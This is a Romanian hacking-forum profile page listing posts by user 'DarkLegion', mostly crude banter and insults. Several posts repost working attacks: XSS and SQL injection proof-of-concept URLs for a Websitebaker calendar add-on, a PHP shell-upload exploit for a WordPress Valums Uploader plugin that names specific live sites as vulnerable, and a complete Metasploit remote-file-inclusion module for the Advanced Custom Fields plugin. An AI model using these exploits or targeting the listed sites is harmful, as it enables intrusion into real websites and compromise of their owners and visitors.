DarkLegion
-
Posts
141 -
Joined
Everything posted by DarkLegion
-
De unde stii ca nu e fake siteul cu vps?
-
Anonymous-Message for Filelist.Ro Administrators
DarkLegion replied to XoddX's topic in Cosul de gunoi
In concluzie noi zicem ca tu ii pupi in cur pe anonimi prea mult. -
Bravo ba, poate iti dau un PS4
-
It would take a desktop PC about 141 quadrillion nonagintillion years to crack your password Nici nu stiam ca exista numarul asta.
-
Unde pula lui 'mnezo ai gasit tu "stairs" si "POLYRC4"?
-
Romanian Gaming Team
-
Romania, te iubesc! - Hackerville [Emisiune Full]
DarkLegion replied to Silviu's topic in Stiri securitate
Ba de curiozitate, cine e Iceman asta? Nu am auzit de el si ma indoiesc ca a spart el nasa sau ce dracu s-o laudat ca o spart -
Advisory: Websitebaker Add-on 'Concert Calendar 2.1.4' XSS & SQLi vulnerability Advisory ID: SSCHADV2013-001 Author: Stefan Schurtz Affected Software: Successfully tested on Concert Calendar 2.1.4 Vendor URL: http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37 Vendor Status: informed ========================== Vulnerability Description ========================== Websitebaker Add-on 'Concert Calendar 2.1.4' is prone to a XSS and SQLi vulnerability ========================== Vuln code ========================== // view.php if (isset($_GET['date'])) { $date = $_GET['date']; } . . . // SQLi $query_dates = mysql_query("SELECT * FROM ".TABLE_PREFIX."mod_concert_dates WHERE section_id = '$section_id' && concert_date = '$date'"); // Zeile 184 // XSS echo " ".switch_date($date, $dateview)." "; // Zeile 176 ========================== PoC-Exploit ========================== // SQLi (magic_quotes = off) http://[target]/wb/pages/addon.php?date=[SQLi] // XSS http://[target]/wb/pages/addon.php?date='"><script>alert(document.cookie)</script> ========================== Solution ========================== - ========================== Disclosure Timeline ========================== 01-Jan-2013 - developer informed ========================== Credits ========================== Vulnerabilities found and advisory written by Stefan Schurtz. ========================== References ========================== http://addons.websitebaker2.org/pages/en/browse-add-ons.php?id=0E8BC37 http://www.darksecurity.de/advisories/2012/SSCHADV2012-022.txt
-
Majoritatea de aici au facut si alte challenge-uri, inafara de afumat... challenge inchis Bravo celor care l-au rezolvat corect
-
Tinta:Zixem-lvl 8 Metoda:Union Based Cerinte: aflarea versiunii, database-ului, user-ului si numele tau PM cu sintaxa, lasa o poza in thread proof: Solvers: 1.Praetorian 2.afumat 3.Sweby 4.totti93
-
The WordPress Valums Uploader plugin suffers from a remote shell upload vulnerability. Note that this finding houses site-specific data. # Exploit Title: Wordpress Valums Uploader Shell Upload Exploit # Date: 4-1-2013 # Author: JingoBD # Tested on: Windows 7 And Ubuntu # Team: BANGLADESH CYBER ARMY # Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, And All Of My BCA Friends. They Rockz. ALSO ALL BANGLADESHI Hacker Team.. =================== EXPLOIT==================== <?php $uploadfile="bangla.php"; $ch = curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php Some Vulnerable Sites: http://www.mmodels.ca/wp/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php http://www.yellowfly.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php http://www3.mhcable.com/v2/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.phps =========================END====================== Thanks http://facebook.com/bdcyberarmy sursa
-
This Metasploit module exploits a remote file inclusion flaw in the WordPress blogging software plugin known as Advanced Custom Fields. The vulnerability allows for remote file inclusion and remote code execution via the export.php script. The Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only works when the php option allow_url_include is set to On (Default Off). ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::PHPInclude def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress Plugin Advanced Custom Fields Remote File Inclusion', 'Description' => %q{ This module exploits a remote file inclusion flaw in the WordPress blogging software plugin known as Advanced Custom Fields. The vulnerability allows for remote file inclusion and remote code execution via the export.php script. The Advanced Custom Fields plug-in versions 3.5.1 and below are vulnerable. This exploit only works when the php option allow_url_include is set to On (Default Off). }, 'Author' => [ 'Charlie Eriksen <charlie@ceriksen.com>', ], 'License' => MSF_LICENSE, 'References' => [ ['OSVDB', '87353'], ['URL', 'http://secunia.com/advisories/51037/'], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'ConnectionType' => 'find', }, }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'Nov 14 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/']), OptString.new('PLUGINSPATH', [true, 'The relative path to the plugins folder', 'wp-content/plugins/']), ], self.class) end def check uri = target_uri.path uri << '/' if uri[-1,1] != '/' uri << datastore['PLUGINSPATH'] uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}advanced-custom-fields/core/api.php" }) if res and res.code == 200 return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def php_exploit uri = target_uri.path uri << '/' if uri[-1,1] != '/' uri << datastore['PLUGINSPATH'] uri << '/' if uri[-1,1] != '/' print_status('Sending request') res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}advanced-custom-fields/core/actions/export.php", 'data' => "acf_abspath=#{php_include_url}" }) if res and res.body =~ /allow_url_include/ fail_with(Exploit::Failure::NotVulnerable, 'allow_url_include is disabled') elsif res.code != 200 fail_with(Exploit::Failure::UnexpectedReply, "Unexpected reply - #{res.code}") end end end SURSA
-
-
Asta-i adevarul, rst-ul vechi era mult mai "unic", mai respectat , mai putini metinisti.. am ajuns o comunitate de "haceri" de 12-13 ani
-
Traim intr-o tara de cacat, condusa de niste infecti ordinari. Doar in romania se sta 29 de zile pana se conving astia ca esti nevinovat. Schimba-ti avocatul tex.
-
ne-ai aratat niste tabele si gata.. le puteai lua de pe goagal si ziceai ca ai gasit sqli in nasa. Baga-ti haviju' in cur!
-
Salut tex, Mult noroc si speram sa isi dea seama ca esti nevinovat. Nimeni nu stie prin ce treci tu. Fii tare. Craciun fericit //DarkLegion
-
Din cate stiu eu metinistii ca tine nu au ce cauta pe RST. oricum.. bun venit
-
Am si eu coaili... 50 euro/min
-
Pana intra tex.. uite-l ba aici
-
Go fuck yourself. Ce vrei sa faci ma cu haviju'? sa il bagi in cur?
-
Il cumpar doar ca sa-l arunc in veceu si sa ma cac pe el S III rulzz
-
translate.google.com
-
Mda.. pe orice apesi te duce inapoi la login te poti caca pe el
-
http://www.youtube.com/watch?v=7yO4Re5jVtU&feature=player_embedded